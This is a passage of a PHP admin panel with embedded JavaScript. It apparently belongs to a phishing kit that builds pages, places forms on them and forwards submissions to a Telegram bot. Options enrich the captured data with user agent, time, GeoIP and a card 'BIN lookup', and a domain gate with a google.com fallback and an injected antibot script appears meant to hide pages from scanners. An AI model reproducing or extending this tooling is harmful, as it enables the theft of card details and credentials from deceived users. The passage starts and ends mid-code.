      if(container && container.parentNode){ container.parentNode.appendChild(metaHost); }
      metaHost.innerHTML =
        '<div class="col-12"><label class="form-label">Telegram Message Template</label>'+
        '<div class="d-flex flex-wrap gap-3">'+
          '<label class="form-check"><input type="radio" name="tg_tpl" id="tg_tpl_pipe" class="form-check-input"> <span class="form-check-label">pipe</span></label>'+
          '<label class="form-check"><input type="radio" name="tg_tpl" id="tg_tpl_pretty" class="form-check-input"> <span class="form-check-label">pretty</span></label>'+
        '</div></div>'+
        '<div class="col-12"><label class="form-label">Telegram Meta</label>'+
          '<div class="d-flex flex-wrap gap-3">'+
            '<label class="form-check"><input type="checkbox" id="tg_meta_ua" class="form-check-input"> <span class="form-check-label">UA</span></label>'+
            '<label class="form-check"><input type="checkbox" id="tg_meta_time" class="form-check-input"> <span class="form-check-label">Time</span></label>'+
            '<label class="form-check"><input type="checkbox" id="tg_meta_geo" class="form-check-input"> <span class="form-check-label">GeoIP</span></label>'+
            '<label class="form-check"><input type="checkbox" id="tg_meta_bin" class="form-check-input"> <span class="form-check-label">BIN lookup</span></label>'+
          '</div>'+
        '</div>'+
        '<div class="col-md-4"><label class="form-label">BIN field name</label><input id="tg_bin_field" class="form-control" placeholder="card_number"></div>';
    }
    var tpl=(obj.behavior && obj.behavior.tg_template) || 'pipe';
    var meta=(obj.behavior && obj.behavior.tg_meta) || {ua:true,time:true,geo:false,bin:false};
    var binField=(obj.behavior && obj.behavior.tg_bin_field) || '';
    $('#tg_tpl_pipe').checked=(tpl==='pipe'); $('#tg_tpl_pretty').checked=(tpl==='pretty');
    $('#tg_meta_ua').checked=!!meta.ua; $('#tg_meta_time').checked=!!meta.time; $('#tg_meta_geo').checked=!!meta.geo; $('#tg_meta_bin').checked=!!meta.bin;
    $('#tg_bin_field').value=binField;

    tbody.innerHTML='';
    (obj.fields||[]).forEach(function(f, idx){
      var tr=document.createElement('tr');
      tr.innerHTML =
        '<td class="text-muted"><i class="fa fa-grip-vertical"></i></td>'+
        '<td><input class="form-control form-control-sm f-name" value="'+(f.name||'')+'"></td>'+
        '<td><input class="form-control form-control-sm f-label" value="'+(f.label||'')+'"></td>'+
        '<td><select class="form-select form-select-sm f-type">'+
            ['text','password','email','number','date','tel'].map(function(t){ return '<option value="'+t+'"'+(f.type===t?' selected':'')+'>'+t+'</option>'; }).join('')+
          '</select></td>'+
        '<td><input class="form-control form-control-sm f-ph" value="'+(f.placeholder||'')+'"></td>'+
        '<td class="text-center"><input class="form-check-input f-req" type="checkbox" '+(f.required?'checked':'')+'></td>'+
        '<td><input class="form-control form-control-sm f-pattern" value="'+(f.pattern||'')+'"></td>'+
        '<td><input class="form-control form-control-sm f-min" value="'+(f.min==null?'':f.min)+'"></td>'+
        '<td><input class="form-control form-control-sm f-max" value="'+(f.max==null?'':f.max)+'"></td>'+
        '<td><textarea class="form-control form-control-sm code f-js" rows="2">'+(f.js||'')+'</textarea></td>'+
        '<td><textarea class="form-control form-control-sm code f-css" rows="2">'+(f.css||'')+'</textarea></td>'+
        '<td><button class="btn btn-sm btn-outline-danger"><i class="fa fa-trash"></i></button></td>';
      tr.querySelector('.btn-outline-danger').addEventListener('click', function(){ obj.fields.splice(idx,1); SETTINGS.forms[currentForm]=obj; saveForms().then(renderFormEditor); });
      tbody.appendChild(tr);
    });
    if(window.Sortable){
      new Sortable(tbody, {handle:'.fa-grip-vertical', animation:150, onEnd:function(){
        var rows=[]; $all('#fieldsTable tbody tr').forEach(function(tr){
          rows.push({
            name: tr.querySelector('.f-name').value.trim(),
            label: tr.querySelector('.f-label').value.trim(),
            type: tr.querySelector('.f-type').value,
            placeholder: tr.querySelector('.f-ph').value,
            required: tr.querySelector('.f-req').checked,
            pattern: tr.querySelector('.f-pattern').value,
            min: tr.querySelector('.f-min').value,
            max: tr.querySelector('.f-max').value,
            js: tr.querySelector('.f-js').value,
            css: tr.querySelector('.f-css').value
          });
        });
        obj.fields=rows; SETTINGS.forms[currentForm]=obj; saveForms();
      }});
    }
  }
  function wireFormsButtons(){
    var btnNew=$('#btnNewForm');
    if(btnNew){ btnNew.addEventListener('click', function(){
      var name=prompt('Form name:','form1'); if(!name) return;
      var fd=new FormData(); fd.append('name', name);
      fetch('admin.php?forms_ops=create', {method:'POST', body:fd})
        .then(function(r){ return r.json(); })
        .then(function(x){ if(!x||!x.ok){ toast((x&&x.err)||'Error','danger'); return; } return loadSettings().then(function(){ currentForm=name; buildFormsList(); renderFormEditor(); toast('Form created'); }); });
    }); }
    $('#btnRenameForm').addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      var nn=prompt('New form name:', currentForm); if(!nn || nn===currentForm) return;
      var fd=new FormData(); fd.append('old', currentForm); fd.append('new', nn);
      fetch('admin.php?forms_ops=rename', {method:'POST', body:fd})
        .then(function(r){ return r.json(); })
        .then(function(x){ if(!x||!x.ok){ toast((x&&x.err)||'Error','danger'); return; } return loadSettings().then(function(){ currentForm=nn; buildFormsList(); renderFormEditor(); toast('Form renamed'); }); });
    });
    $('#btnDeleteForm').addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      if(!confirm('Delete this form?')) return;
      var fd=new FormData(); fd.append('name', currentForm);
      fetch('admin.php?forms_ops=delete', {method:'POST', body:fd})
        .then(function(r){ return r.json(); })
        .then(function(x){ if(!x||!x.ok){ toast((x&&x.err)||'Error','danger'); return; } return loadSettings().then(function(){ currentForm=Object.keys(SETTINGS.forms||{})[0]||''; buildFormsList(); renderFormEditor(); toast('Form deleted','warning'); }); });
    });
    $('#btnAddField').addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      var obj=SETTINGS.forms[currentForm]; obj.fields=obj.fields||[];
      obj.fields.push({name:'',label:'',type:'text',placeholder:'',required:false,pattern:'',min:'',max:'',js:'',css:''});
      SETTINGS.forms[currentForm]=obj; saveForms().then(renderFormEditor);
    });
    $('#btnSaveForm').addEventListener('click', function(){
      if(!currentForm){ toast('Select a form','warning'); return; }
      var obj=SETTINGS.forms[currentForm]; if(!obj) return;
      var rows=[]; $all('#fieldsTable tbody tr').forEach(function(tr){
        rows.push({
          name: tr.querySelector('.f-name').value.trim(),
          label: tr.querySelector('.f-label').value.trim(),
          type: tr.querySelector('.f-type').value,
          placeholder: tr.querySelector('.f-ph').value,
          required: tr.querySelector('.f-req').checked,
          pattern: tr.querySelector('.f-pattern').value,
          min: tr.querySelector('.f-min').value,
          max: tr.querySelector('.f-max').value,
          js: tr.querySelector('.f-js').value,
          css: tr.querySelector('.f-css').value
        });
      });
      obj.fields = rows;
      var tpl = $('#tg_tpl_pretty') && $('#tg_tpl_pretty').checked ? 'pretty' : 'pipe';
      obj.behavior = {
        label: $('#bh_label').value || 'Submit',
        telegram: $('#bh_telegram').checked,
        redirect: $('#bh_redirect') ? $('#bh_redirect').value || '' : '',
        alert: $('#bh_alert').value || '',
        webhook: $('#bh_webhook').value || '',
        js: ($('#bh_js') && $('#bh_js').value) || '',
        tg_template: tpl,
        tg_meta: {
          ua: !!($('#tg_meta_ua') && $('#tg_meta_ua').checked),
          time: !!($('#tg_meta_time') && $('#tg_meta_time').checked),
          geo: !!($('#tg_meta_geo') && $('#tg_meta_geo').checked),
          bin: !!($('#tg_meta_bin') && $('#tg_meta_bin').checked)
        },
        tg_bin_field: ($('#tg_bin_field') && $('#tg_bin_field').value) || ''
      };
      obj.css = $('#form_css').value || '';
      SETTINGS.forms[currentForm]=obj; saveForms().then(function(){ toast('Form saved'); });
    });
  }

  /* ---------- WIDGETS ---------- */
  function buildWidgetsList(){
    var host=$('#widgetsList'); if(!host) return; host.innerHTML='';
    Object.keys(SETTINGS.widgets||{}).forEach(function(n){
      var a=document.createElement('a');
      a.href='javascript:void(0)';
      a.className='ua-item d-flex justify-content-between align-items-center';
      a.innerHTML='<span><i class="fa fa-puzzle-piece me-2"></i>'+n+'</span><i class="fa fa-angle-right text-muted"></i>';
      a.addEventListener('click', function(){ currentWidget=n; renderWidgetEditor(); });
      host.appendChild(a);
    });
  }
  function renderWidgetEditor(){ $('#curWidget').textContent=currentWidget||'—'; var t=$('#widget_html'); var w=(SETTINGS.widgets||{})[currentWidget]; if(t) t.value = w ? (w.html||'') : ''; }
  function wireWidgetsButtons(){
    $('#btnNewWidget').addEventListener('click', function(){
      var name=prompt('Widget name:','hero'); if(!name) return;
      if((SETTINGS.widgets||{})[name]){ toast('Name exists','warning'); return; }
      SETTINGS.widgets[name]={html:"<section class='container my-5'><h2>Hero</h2><p>Describe...</p></section>"}; saveWidgets().then(function(){ currentWidget=name; buildWidgetsList(); renderWidgetEditor(); toast('Widget created'); });
    });
    $('#btnRenameWidget').addEventListener('click', function(){
      if(!currentWidget){ toast('Select a widget','warning'); return; }
      var nn=prompt('New widget name:',currentWidget); if(!nn || nn===currentWidget) return;
      if((SETTINGS.widgets||{})[nn]){ toast('Name used','danger'); return; }
      SETTINGS.widgets[nn]=SETTINGS.widgets[currentWidget]; delete SETTINGS.widgets[currentWidget];
      (SETTINGS.pages||[]).forEach(function(p){ Object.keys(p.regions||{}).forEach(function(k){ var r=p.regions[k]; if(r && r.type==='widget' && r.widget===currentWidget) r.widget=nn; }); });
      Promise.all([ saveWidgets(), savePages() ]).then(function(){ currentWidget=nn; buildWidgetsList(); renderWidgetEditor(); toast('Widget renamed'); });
    });
    $('#btnDeleteWidget').addEventListener('click', function(){
      if(!currentWidget){ toast('Select a widget','warning'); return; }
      if(!confirm('Delete widget?')) return;
      delete SETTINGS.widgets[currentWidget];
      (SETTINGS.pages||[]).forEach(function(p){ Object.keys(p.regions||{}).forEach(function(k){
        var r=p.regions[k]; if(r && r.type==='widget' && r.widget===currentWidget){
          p.regions[k]={type:'html', content:"<div class='alert alert-warning'>Widget removed. Assign something else here.</div>"};
        }
      }); });
      Promise.all([ saveWidgets(), savePages() ]).then(function(){ currentWidget=Object.keys(SETTINGS.widgets||{})[0]||''; buildWidgetsList(); renderWidgetEditor(); toast('Widget deleted','warning'); });
    });
    $('#btnSaveWidgets').addEventListener('click', function(){
      if(currentWidget && $('#widget_html')){ (SETTINGS.widgets||{})[currentWidget] = {html: $('#widget_html').value}; }
      saveWidgets().then(function(){ toast('Widgets saved'); });
    });
  }

  /* ---------- THEME + TELEGRAM ---------- */
  function renderTheme(){ var font=SETTINGS.theme.font||'Inter, Segoe UI, Tahoma, sans-serif', color=SETTINGS.theme.color_primary||'#2563EB', bg=SETTINGS.theme.background||'#F6FAFF'; $('#th_font').value=font; $('#th_color').value=color; $('#th_bg').value=bg; var prev=$('#themePreview'); if(prev){ prev.style.fontFamily=font; prev.style.background=bg; } document.documentElement.style.setProperty('--brand', color); }
  function renderTelegram(){ $('#tg_token').value=(SETTINGS.telegram&&SETTINGS.telegram.bot_token)||''; $('#tg_chat').value=(SETTINGS.telegram&&SETTINGS.telegram.chat_id)||''; }
  function wireThemeTelegramButtons(){
    $('#btnSaveTheme').addEventListener('click', function(){ SETTINGS.theme={ font: $('#th_font').value, color_primary: $('#th_color').value, background: $('#th_bg').value }; saveTheme().then(function(){ toast('Theme saved'); renderTheme(); }); });
    $('#btnSaveTelegram').addEventListener('click', function(){ SETTINGS.telegram={ bot_token: ($('#tg_token').value||'').trim(), chat_id: ($('#tg_chat').value||'').trim() }; saveTelegram().then(function(){ toast('Telegram saved'); }); });
  }

  /* ---------- DOMAIN / IP ---------- */
  function buildDomainAccess(){
    var host=$('#daList'); if(!host) return; host.innerHTML='';
    (SETTINGS.domain_access||[]).forEach(function(item, idx){
      var row=document.createElement('div'); row.className='row g-2 align-items-end da-row mb-3 ua-card p-3';
      row.innerHTML =
        '<div class="col-md-2"><label class="form-label mini">Label</label><input class="form-control da-label" value="'+(item.label||'')+'"></div>'+
        '<div class="col-md-2"><label class="form-label mini">Server B IP</label><input class="form-control da-bip" value="'+(item.server_b_ip||'')+'"></div>'+
        '<div class="col-md-4"><label class="form-label mini">A_BASE</label><input class="form-control da-ab" value="'+(item.a_base||'')+'"></div>'+
        '<div class="col-md-2"><label class="form-label mini">TTL (sec)</label><input type="number" min="60" class="form-control da-ttl" value="'+(item.session_ttl||3600)+'"></div>'+
        '<div class="col-md-2"><label class="form-label mini">Fallback URL</label><input class="form-control da-fb" value="'+(item.fallback_url||'https://www.google.com')+'"></div>'+
        '<div class="col-md-3"><div class="form-check mt-2">'+
          '<input class="form-check-input da-tgtag" type="checkbox" '+(item.tg_include_session_tag?'checked':'')+' id="tgst_'+idx+'">'+
          '<label class="form-check-label" for="tgst_'+idx+'">Include session tag in Telegram</label></div>'+
        '</div>'+
        '<div class="col-md-2"><label class="form-label mini">Tag length</label><input type="number" min="3" class="form-control da-taglen" value="'+(item.session_tag_len||6)+'"></div>'+
        '<div class="col-12 d-flex gap-2 pt-1">'+
          '<button class="btn btn-outline-danger btn-sm da-del"><i class="fa fa-trash"></i> Remove</button>'+
          '<button class="btn btn-outline-primary btn-sm da-dl"><i class="fa fa-download"></i> Download index.php</button>'+
        '</div>';
      row.querySelector('.da-del').addEventListener('click', function(){
        SETTINGS.domain_access.splice(idx,1);
        saveDomainAccess().then(function(){ buildDomainAccess(); toast('Removed','warning'); });
      });
      row.querySelector('.da-dl').addEventListener('click', function(){
        var fd=new FormData(); fd.append('index', idx);
        fetch('admin.php?download_index=1', {method:'POST', body:fd})
          .then(function(r){ return r.blob(); })
          .then(function(blob){ var url=URL.createObjectURL(blob); var a=document.createElement('a'); a.href=url; a.download='index.php'; document.body.appendChild(a); a.click(); setTimeout(function(){ URL.revokeObjectURL(url); a.remove(); }, 200); });
      });
      host.appendChild(row);
    });
  }
  function wireDomainButtons(){
    $('#btnDAAdd').addEventListener('click', function(){
      SETTINGS.domain_access = SETTINGS.domain_access || [];
      SETTINGS.domain_access.push({label:'New',server_b_ip:'',a_base:'',session_ttl:3600,fallback_url:'https://www.google.com',tg_include_session_tag:true,session_tag_len:6});
      buildDomainAccess();
    });
    $('#btnDASave').addEventListener('click', function(){
      var out=[]; $all('.da-row').forEach(function(row){
        out.push({
          label: row.querySelector('.da-label').value || '',
          server_b_ip: row.querySelector('.da-bip').value || '',
          a_base: row.querySelector('.da-ab').value || '',
          session_ttl: parseInt(row.querySelector('.da-ttl').value||'3600',10)||3600,
          fallback_url: row.querySelector('.da-fb').value || 'https://www.google.com',
          tg_include_session_tag: !!row.querySelector('.da-tgtag').checked,
          session_tag_len: Math.max(3, parseInt(row.querySelector('.da-taglen').value||'6',10)||6)
        });
      });
      SETTINGS.domain_access = out;
      saveDomainAccess().then(function(){ toast('Domain/IP saved'); });
    });
    $('#btnDABuild').addEventListener('click', function(){
      fetch('admin.php?build_domain_gate=1', {method:'POST'})
        .then(function(r){ return r.json(); })
        .then(function(x){ toast(x && x.ok ? 'Gate built' : 'Failed', x && x.ok ? 'success':'danger'); });
    });
  }

  /* ---------- TOPBAR ---------- */
  function wireTopbar(){
    $('#btnLogout').addEventListener('click', function(){ localStorage.removeItem('ultra_admin_ok'); showLogin(); });
    $('#btnExport').addEventListener('click', function(){ location.href='admin.php?export=1'; });
    $('#btnSaveAll').addEventListener('click', function(){ j('admin.php?save_all=1','POST', SETTINGS||{}).then(function(){ toast('Saved'); }); });
    $('#btnBackups').addEventListener('click', function(){
      fetch('admin.php?list_backups=1', {method:'POST'}).then(function(r){ return r.json(); }).then(function(data){
        var host=$('#backupList'); if(!host) return; host.innerHTML='';
        (data.backups||[]).forEach(function(fn){
          var a=document.createElement('a');
          a.href='javascript:void(0)'; a.className='ua-item d-flex justify-content-between align-items-center';
          a.innerHTML='<span>'+fn+'</span><button class="btn btn-sm btn-outline-primary"><i class="fa fa-rotate-left"></i> Restore</button>';
          a.querySelector('button').addEventListener('click', function(){
            if(!confirm('Restore this backup?')) return;
            var fd=new FormData(); fd.append('name', fn);
            fetch('admin.php?restore_backup=1', {method:'POST', body:fd})
              .then(function(){ return loadSettings(); })
              .then(function(){ buildAll(); toast('Restored'); });
          });
          host.appendChild(a);
        });
        if(window.bootstrap){ new bootstrap.Modal('#modalBackups').show(); }
      });
    });
  }

  function buildAll(){
    buildPagesList(); renderPageEditor(); renderPagePreview(); wirePageButtons();
    buildFormsList(); currentForm = Object.keys(SETTINGS.forms||{})[0]||''; renderFormEditor(); wireFormsButtons();
    buildWidgetsList(); currentWidget = Object.keys(SETTINGS.widgets||{})[0]||''; renderWidgetEditor(); wireWidgetsButtons();
    renderTheme(); renderTelegram(); wireThemeTelegramButtons();
    buildDomainAccess(); wireDomainButtons();
  }
  function afterLogin(){ showApp(); wireTopbar(); loadSettings().then(function(){ buildAll(); }); }
  function init(){ if(!bindLogin()){ setTimeout(bindLogin, 60); } if(localStorage.getItem('ultra_admin_ok')==='1'){ afterLogin(); } else { showLogin(); } }
  if(document.readyState==='loading'){ document.addEventListener('DOMContentLoaded', init); } else { init(); }
})();
JS;
  $js = str_replace('__ADMIN_PASSWORD_PLACEHOLDER__', $ADMIN_PASSWORD_JS, $js);
  echo $js; exit;
}

/* ------------------ ASSET: render.js --------------------- */
if (isset($_GET['asset']) && $_GET['asset'] === 'render.js') {
  header('Content-Type: application/javascript; charset=utf-8');
  $js = <<<'JS'
(function(){
  function ready(fn){ if(document.readyState!=='loading') fn(); else document.addEventListener('DOMContentLoaded', fn); }
  async function loadSettings(){ const r=await fetch('settings.json?'+Date.now()); return await r.json(); }
  function currentFile(){ const f=location.pathname.split('/').pop(); return f||'index.php'; }
  function applyFormCSS(host, formObj){ if(formObj && formObj.css){ host.style.cssText += ';' + formObj.css; } }

  ready(async function(){
    let settings; try{ settings=await loadSettings(); }catch(_){ return; }
    const page=(settings.pages||[]).find(p=> currentFile()===p.php || currentFile().endsWith(p.php));
    if(!page) return;

    const regions=page.regions||{};
    document.querySelectorAll('[data-region]').forEach(function(node){
      const key=node.getAttribute('data-region');
      const conf=regions[key]; if(!conf) return;
      const type=conf.type||'html';

      if(type==='html'){ node.innerHTML=conf.content||''; }
      else if(type==='widget'){ const html=settings.widgets?.[conf.widget]?.html||''; node.innerHTML=html; }
      else if(type==='form'){
        node.innerHTML='';
        const host=document.createElement('div'); host.id='r_'+Math.random().toString(36).slice(2); node.appendChild(host);
        applyFormCSS(host, settings.forms?.[conf.form]);
        window.FormsCore && window.FormsCore.inject(host.id, conf.form);
      }
      else if(type==='forms'){
        node.innerHTML='';
        (conf.forms||[]).forEach(function(name){
          const wrap=document.createElement('div'); wrap.id='r_'+Math.random().toString(36).slice(2); node.appendChild(wrap);
          applyFormCSS(wrap, settings.forms?.[name]);
          window.FormsCore && window.FormsCore.inject(wrap.id, name);
        });
      }
    });
  });
})();
JS;
  echo $js; exit;
}

/* ------------------ ASSET: picker.js --------------------- */
if(isset($_GET['asset']) && $_GET['asset']==='picker.js'){
  header('Content-Type: application/javascript; charset=utf-8');
  $js=<<<'JS'
(function(){
  const hl=document.createElement('div');
  hl.style.cssText='position:fixed;z-index:999998;border:2px solid #2563EB;background:rgba(37,99,235,.08);pointer-events:none;display:none';
  const tip=document.createElement('div');
  tip.style.cssText='position:fixed;z-index:999999;background:#0b1220;color:#fff;font:12px/1.4 system-ui;padding:6px 8px;border-radius:8px;display:none';
  document.documentElement.appendChild(hl); document.documentElement.appendChild(tip);

  let curMode='inside';
  function modeFromKeys(e){ if(e.ctrlKey||e.metaKey) return 'replace'; if(e.altKey) return 'before'; if(e.shiftKey) return 'after'; return 'inside'; }
  function modeLabel(m){ return m==='before'?'Insert BEFORE': m==='after'?'Insert AFTER': m==='replace'?'REPLACE element':'Insert INSIDE (append)'; }
  function idx(el){let i=1;for(let s=el.previousElementSibling;s;s=s.previousElementSibling){ if(s.tagName===el.tagName) i++; } return i;}
  function xPath(el){ if(el.id) return '//*[@id="'+el.id+'"]'; const segs=[]; for(;el&&el.nodeType===1; el=el.parentElement){ segs.unshift(el.tagName.toLowerCase()+'['+idx(el)+']'); if(el.tagName.toLowerCase()==='html') break; } return '/'+segs.join('/'); }
  function cssPath(el){ const segs=[]; for(;el&&el.nodeType===1; el=el.parentElement){ segs.unshift(el.tagName.toLowerCase()+':nth-of-type('+idx(el)+')'); if(el.tagName.toLowerCase()==='html') break; } return segs.join(' > '); }
  function show(el, e){
    const r=el.getBoundingClientRect();
    hl.style.display='block'; hl.style.left=r.left+'px'; hl.style.top=r.top+'px'; hl.style.width=r.width+'px'; hl.style.height=r.height+'px';
    tip.style.display='block'; tip.textContent = modeLabel(curMode)+'  •  '+el.tagName.toLowerCase()+(el.id?('#'+el.id):'');
    tip.style.left=(Math.max(6, Math.min(window.innerWidth-260, e.clientX+12)))+'px';
    tip.style.top=(Math.max(6, e.clientY+12))+'px';
  }
  function hide(){ hl.style.display='none'; tip.style.display='none'; }

  document.addEventListener('mousemove',(e)=>{ curMode = modeFromKeys(e); const t=e.target; if(t===document.documentElement||t===document.body){ hide(); return; } show(t,e); },{capture:true});
  document.addEventListener('mouseout',(e)=>{ if(!e.relatedTarget) hide(); },{capture:true});
  document.addEventListener('keydown',(e)=>{ curMode = modeFromKeys(e); },{capture:true});
  document.addEventListener('keyup',(e)=>{ curMode = modeFromKeys(e); },{capture:true});

  document.addEventListener('click',(e)=>{
    e.preventDefault(); e.stopPropagation();
    const el=e.target;
    const payload={ type:'UA_PICK', xpath:xPath(el), css:cssPath(el), id:el.id||'', mode: curMode };
    hide();
    window.parent.postMessage(payload,'*');
  },{capture:true});

  document.addEventListener('keydown',(e)=>{ if(e.key==='Escape'){ hide(); window.parent.postMessage({type:'UA_PICK_CANCEL'},'*'); } },{capture:true});

  const header=document.createElement('div');
  header.style.cssText='position:fixed;left:6px;bottom:6px;z-index:1000000;background:#0b1220;color:#fff;padding:6px 8px;border-radius:8px;font:12px system-ui;opacity:.9';
  header.innerHTML='Click=inside • Alt=before • Shift=after • Ctrl/Cmd=replace';
  document.documentElement.appendChild(header);
})();
JS;
  echo $js; exit;
}
/* ensure forms core exists */
if (isset($_GET['ensure_forms_core'])) { write_forms_core_js($FORMS_CORE_JS); echo json_encode(['ok'=>1]); exit; }

/* --------- mark/unmark region --------- */
if(isset($_GET['mark_region']) && $_SERVER['REQUEST_METHOD']==='POST'){
  $file=basename($_POST['filename']??'');
  $region=preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['region']??'');
  $xpath=trim($_POST['xpath']??''); $css=trim($_POST['css']??'');
  $id=trim($_POST['id']??''); $mode=trim($_POST['mode']??'inside');

  if(!$file || !$region){ echo json_encode(['ok'=>0,'err'=>'Bad params']); exit; }
  $path=$PAGES_DIR.$file; if(!file_exists($path)){ echo json_encode(['ok'=>0,'err'=>'Not found']); exit; }
  $html=file_get_contents($path);

  libxml_use_internal_errors(true);
  $dom=new DOMDocument(); @$dom->loadHTML($html);
  $xp=new DOMXPath($dom);

  $el=null;
  if($id){ $el=$dom->getElementById($id); }
  if(!$el && $xpath){ $nodes=$xp->evaluate($xpath); if($nodes instanceof DOMNodeList && $nodes->length>0) $el=$nodes->item(0); }
  if(!$el && $css){
    $parts = array_map('trim', explode('>', $css));
    $x=''; foreach($parts as $seg){
      if(!preg_match('/^([a-z0-9]+)(?::nth-of-type\((\d+)\))?$/i',$seg,$m)){ $x=''; break; }
      $tag=strtolower($m[1]); $idx = isset($m[2])?intval($m[2]):1; $x.='/'.$tag.'['.$idx.']';
    }
    if($x){ $nodes=$xp->evaluate($x); if($nodes instanceof DOMNodeList && $nodes->length>0) $el=$nodes->item(0); }
  }
  if(!$el){ echo json_encode(['ok'=>0,'err'=>'Selector not found']); exit; }

  $wrap = $dom->createElement('div');
  $wrap->setAttribute('data-region', $region);

  switch($mode){
    case 'before':  $el->parentNode->insertBefore($wrap, $el); break;
    case 'after':   if($el->nextSibling) $el->parentNode->insertBefore($wrap, $el->nextSibling); else $el->parentNode->appendChild($wrap); break;
    case 'replace': $el->parentNode->replaceChild($wrap, $el); break;
    case 'inside':
    default:        $el->appendChild($wrap); break;
  }

  $new=$dom->saveHTML();

  if(strpos($new,'telegram.js')===false){ $new=preg_replace('/<\/body>\s*<\/html>\s*$/i', "\n<script src=\"telegram.js\"></script>\n</body>\n</html>", $new); }
  if(strpos($new,'forms/forms_core.js')===false){ $new=preg_replace('/<\/body>\s*<\/html>\s*$/i', "\n<script src=\"forms/forms_core.js\" defer></script>\n</body>\n</html>", $new); }
  if(strpos($new,'admin.php?asset=render.js')===false){ $new=preg_replace('/<\/body>\s*<\/html>\s*$/i', "\n<script src=\"admin.php?asset=render.js\" defer></script>\n</body>\n</html>", $new); }
  if(strpos($new,'antibot.js')===false){ $new=preg_replace('/<\/body>\s*<\/html>\s*$/i', "\n<script src=\"antibot.js\" defer></script>\n</body>\n</html>", $new); }
  if(strpos($new,'antibot_runtime.php')===false){ $new = "<?php @include __DIR__.'/antibot_runtime.php'; ?>\n".$new; }

  @copy($path, $BACKUP_DIR."/{$file}.".date('Ymd_His').".bak");
  file_put_contents($path,$new);
  echo json_encode(['ok'=>1]); exit;
}

if(isset($_GET['unmark_region']) && $_SERVER['REQUEST_METHOD'] === 'POST'){
  $file=basename($_POST['filename']??'');
  $region=preg_replace('/[^A-Za-z0-9_\-]+/','', $_POST['region']??'');
  if(!$file || !$region){ echo json_encode(['ok'=>0,'err'=>'Bad params']); exit; }

  $path=$PAGES_DIR.$file; if(!file_exists($path)){ echo json_encode(['ok'=>0,'err'=>'Not found']); exit; }
  $html=file_get_contents($path);

  libxml_use_internal_errors(true);
  $dom=new DOMDocument(); @$dom->loadHTML($html);
  $xp=new DOMXPath($dom);
  $nodes=$xp->query('//*[@data-region="'.$region.'"]');

  $count=0;
  if($nodes){
    $arr=[]; foreach($nodes as $n) $arr[]=$n;
    foreach($arr as $el){
      $onlyAttr = ($el->attributes && $el->attributes->length===1);
      $emptyContent = (trim($el->textContent) === '' && !$el->firstElementChild);
      if($onlyAttr && $emptyContent && strtolower($el->tagName)==='div'){ $el->parentNode->removeChild($el); }
      else { $el->removeAttribute('data-region'); }
      $count++;
    }
  }
  $new=$dom->saveHTML();
  @copy($path, $BACKUP_DIR."/{$file}.".date('Ymd_His').".bak");
  file_put_contents($path,$new);
  echo json_encode(['ok'=>1,'count'=>$count]); exit;
}

/* ------------------- ROUTES (POST) ----------------------- */
if ($_SERVER['REQUEST_METHOD'] === 'POST') {

  if (isset($_GET['save_all'])) {
    $raw = file_get_contents('php://input'); json_decode($raw);
    if (json_last_error() !== JSON_ERROR_NONE) { http_response_code(400); echo json_encode(['ok'=>0,'err'=>'Invalid JSON']); exit; }
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    file_put_contents($SETTINGS_FILE, $raw);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['save_section'])) {
    $section = $_GET['save_section'];
    $payload = json_decode(file_get_contents('php://input'), true);
    if (!in_array($section, ['theme','telegram','widgets','forms','pages','versions','antibot','domain_access'])) { echo json_encode(['ok'=>0,'err'=>'Bad section']); exit; }
    $s = load_settings($SETTINGS_FILE);
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    $s[$section] = $payload;
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1]); exit;
  }

  if (isset($_GET['create_page'])) {
    $s = load_settings($SETTINGS_FILE);
    $display = trim($_POST['display'] ?? '') ?: 'Page '.substr(md5(mt_rand()),0,4);
    $rand = substr(md5(mt_rand()), 0, 8);
    $filename = sanitize_filename("page_{$rand}.php");

    $starter = "<!doctype html>\n<html lang=\"en\">\n<head>\n<meta charset=\"utf-8\">\n<meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">\n<title>".htmlspecialchars($display,ENT_QUOTES,'UTF-8')."</title>\n<link href=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css\" rel=\"stylesheet\">\n</head>\n<body>\n<div data-region=\"header\" class=\"container\"></div>\n<main data-region=\"main\" class=\"container my-4\"></main>\n<div data-region=\"footer\" class=\"container\"></div>\n<script src=\"https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js\" defer></script>\n<script src=\"telegram.js\"></script>\n<script src=\"forms/forms_core.js\" defer></script>\n<script src=\"admin.php?asset=render.js\" defer></script>\n<script src=\"antibot.js\" defer></script>\n<?php @include __DIR__.'/antibot_runtime.php'; ?>\n</body>\n</html>";
    file_put_contents($PAGES_DIR.$filename, $starter);

    if (!file_exists($FORMS_CORE_JS)) write_forms_core_js($FORMS_CORE_JS);

    $s['pages'][] = [
      "display" => $display,
      "php"     => $filename,
      "regions" => [
        "header" => ["type"=>"widget","widget"=>"header"],
        "main"   => ["type"=>"html","content"=>"<div class='alert alert-info'>main region (no content).</div>"],
        "footer" => ["type"=>"widget","widget"=>"footer"]
      ]
    ];
    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1,'php'=>$filename,'display'=>$display]); exit;
  }

  if (isset($_GET['retrofit_page'])) {
    $file = basename($_POST['filename'] ?? '');
    if (!preg_match('/^page_[a-z0-9]{8}\.php$/i',$file)){ echo json_encode(['ok'=>0,'err'=>'Bad filename']); exit; }
    $path = $PAGES_DIR.$file;
    if (!file_exists($path)){ echo json_encode(['ok'=>0,'err'=>'Not found']); exit; }
    $html = file_get_contents($path);
    $inject = '';
    if (strpos($html,'telegram.js')===false){         $inject .= "\n<script src=\"telegram.js\"></script>\n"; }
    if (strpos($html,'forms/forms_core.js')===false){ $inject .= "<script src=\"forms/forms_core.js\" defer></script>\n"; }
    if (strpos($html,'admin.php?asset=render.js')===false){ $inject .= "<script src=\"admin.php?asset=render.js\" defer></script>\n"; }
    if (strpos($html,'antibot.js')===false){          $inject .= "<script src=\"antibot.js\" defer></script>\n"; }
